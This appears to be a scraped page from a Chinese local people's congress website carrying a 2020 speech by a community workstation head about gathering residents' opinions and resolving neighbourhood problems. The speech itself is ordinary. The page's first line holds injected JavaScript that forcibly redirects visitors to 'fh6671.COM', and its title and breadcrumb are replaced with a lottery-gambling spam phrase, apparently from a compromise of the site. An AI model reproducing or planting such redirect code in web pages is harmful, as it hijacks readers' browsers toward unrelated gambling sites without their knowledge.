function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新代表履职  >>  代表风采  
小站点 有作为
来源:       日期: 2020-06-23      作者: 赵晓慧      点击数:

——市雄关街道雄关社区人大代表工作站经验材料

雄关社区人大代表工作站站长      赵晓慧

 

尊敬的各位领导、同志们:

大家好!

我来自雄关街道雄关社区,现任雄关社区党委副书记,兼任社区人大代表工作站站长。作为一名基层工作者,我认真履行人大代表工作站的职责,牢固树立“四个意识”, 守初心,担使命,用心人大工作、服务人大工作。下面我就社区人大代表工作站如何更好发挥“为党传声,为民代言”作用进行交流汇报,不妥之处,敬请批评指正!

一、小岗位 新课题

作为一名基层社区人大工作站站长,面对9个居民小区6千户近2万人的服务人口,加之雄关社区所处辖区面积大、新建小区多、自建大院乱、流动人口杂的城乡结合带,可谓问题层出不穷,防不胜防,群众服务需求千差万别,我深感担子重,压力大。如何发挥群众家门口“联心桥”作用,更密切贴近群众、开展贴心服务,进一步密切党群干群关系,着力解决联系服务群众“最后一公里”问题,有效拓宽社区人大代表工作站服务平台作用,更好服务代表、服务选民,就成了摆在面前的一个新课题。

为做好这个新课题,我坚守“不忘初心,牢记使命”永恒课题,始终把学习贯穿于履行职责的全过程。一方面自觉参加社区党委理论中心组学习,坚持深入学习党的十九大和习近平新时代中国特色社会主义思想、习近平坚持和完善人民代表大会重要思想,不断提高自身思想政治素质, 注重理论联系实际,围绕社区中心工作中出现的新情况、新问题,积极探索新思路新方法,有效推动人大工作站工作的开展。另一方面,为了适应新时代新任务对代表提出新的更高要求,认真组织人大工作站开展“我学习,我代言,我服务”主题活动,加强对《宪法》、《地方组织法》、《代表法》、《选举法》、《监督法》等法律法规和上级有关人大及其常委会决议、决定的学习; 同时积极参与雄关街道人大工作学习日活动,通过现场观摩学习、座谈汇报、文件传达、《宪法》诵读等环节,使我和代表受益匪浅,不仅提高了代表依法履职的能力,增强代表“为党传声,为民代言”的主人翁责任感和使命感也为工作站更好地服务于选民,推动社区人大工作站在新时代社区治理中发挥好桥梁纽带作用。

二、小平台  大支撑

为保证代表听民声、察民意、解民忧落到实处,切实搭建好基层人大代表发挥作用的重要平台。按照社区人大工作站每月“选民固定接待日”和集中接待选民工作要求,社区党委及时召开专题会,针对片大问题多、工作站人手紧缺的现状,党委决定网格党小组牵头,辖区10个网格小组联动起来,实行选民意见建议“线下线上”互动征集责任制,形成“党员+网格”“民呼我应”社区人大工作站全方位服务模式,为征集切实可行的意见建议拓展良好途径。社区人大代表工作站以“民呼我应、服务连心”活动为载体,积极发挥作用:一是代表“连心服务”进社区。社区人大工作站围绕社区中心工作,以服务社区百姓为出发点,就人民群众关心的热点、难点问题进行调研,每年开展选民集中接待2次,提出了有价值的意见和建议共16条,有效推动解决物业矛盾问题、环保督查问题、小区治理等困扰居民多年的老大难问题9件,以积极作为赢得辖区选民的普遍认可。二是“民呼我应”解民忧。工作站联系代表通过“民情大走访、便民电话征集、网格联心服务群征集”等多种方式,收集社区困难群体的“微心愿”,建立“心愿台账”,同时结合代表优势特长,主动认领“微心愿”接地气,帮助网格内空巢、独居老人、单亲家庭等困难群众排忧解难。目前共收集选民群众“微心愿”46个,已经帮助实现了31个。三是“三个一”活动促和谐。代表通过参与社区活动,为社区治理提一条合理化建议,为社区民生办一件实事,为居民需求做一次志愿服务活动等,切切实实把服务做到群众的心坎上得到社区居民的高度赞扬和一致认可,拉近了人大代表和选民之间的距离,有效促进了基层社会的和谐稳定。

三、小站点  大作用

走近群众,了解群众,帮助群众,以服务群众“最后一公里”为己任,终会积沙成塔。 工作站成立前,辖区每年都有不少群访或投诉热线,特别是针对群众关注度较高的转播台环境卫生脏乱差、文化路市场改造整顿、西御花园无物业问题、河口西路道路改造、珏洋花园暖气不热、嘉德苑、富力花苑房和珏洋花园房产证等的遗留已久的老大难问题成了困扰社区和广大居民群众悬而未决的头痛事。社区人大工作站成立以后,我们充分发挥站点打通服务居民群众“最后一公里”的作用,采取集中接待选民“面对面听”,“民情大走访”入户“个别听”、网格楼栋群问题征集“线上听”、化解投诉电话“耐心答”等方式,协调相关单位使这些问题逐步得以解决。作为一名基层社区人大工作站站长,只有以接地气的工作方式解决好群众的操心事、烦心事、揪心事,才能真正落实“守初心,担使命”的工作目标,才能找到“为党传声,为民代言”在基层的落脚点。
    打开社区人大工作站的选民意见建议登记记录,显示自工作站成立以来,2017年收集民情民意35条,2018年收集民情民意24条,2019年收集民情民意20条,2020年收集7条,已经处理解决的71件,目前正在协调解决53件。“以前解决不了的问题现在终于推动了,居民意见数量越来越少了,说明我们的工作站起大作用了!”大家由衷的说道。
    基层人大工作站的工作或许不是惊天动地,也不是桩桩件件落人心,但每赢得群众的一次满意,就犹如春风化雨,润物细无声,呵护滋养着我们的“美丽雄关、幸福家园”在此我为一头连着上级组织,一头牵着万户千家的基层人大工作站的所有同仁们感到自豪和荣幸!

谢谢大家!